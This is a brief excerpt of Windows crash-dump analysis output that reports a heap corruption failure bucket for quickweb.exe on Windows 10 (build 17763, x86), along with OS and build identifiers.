STACK_COMMAND: ** Pseudo Context ** ManagedPseudo ** Value: 7ba5870 ** ; kb
FAILURE_BUCKET_ID: HEAP_CORRUPTION_80000003_heap_corruption!quickweb.exe
OS_VERSION: 10.0.17763.1
BUILDLAB_STR: rs5_release
OSPLATFORM_TYPE: x86
OSNAME: Windows 10
FAILURE_ID_HASH: {68efeb37-77bb-f968-fc16-9a1fba88436f}
"""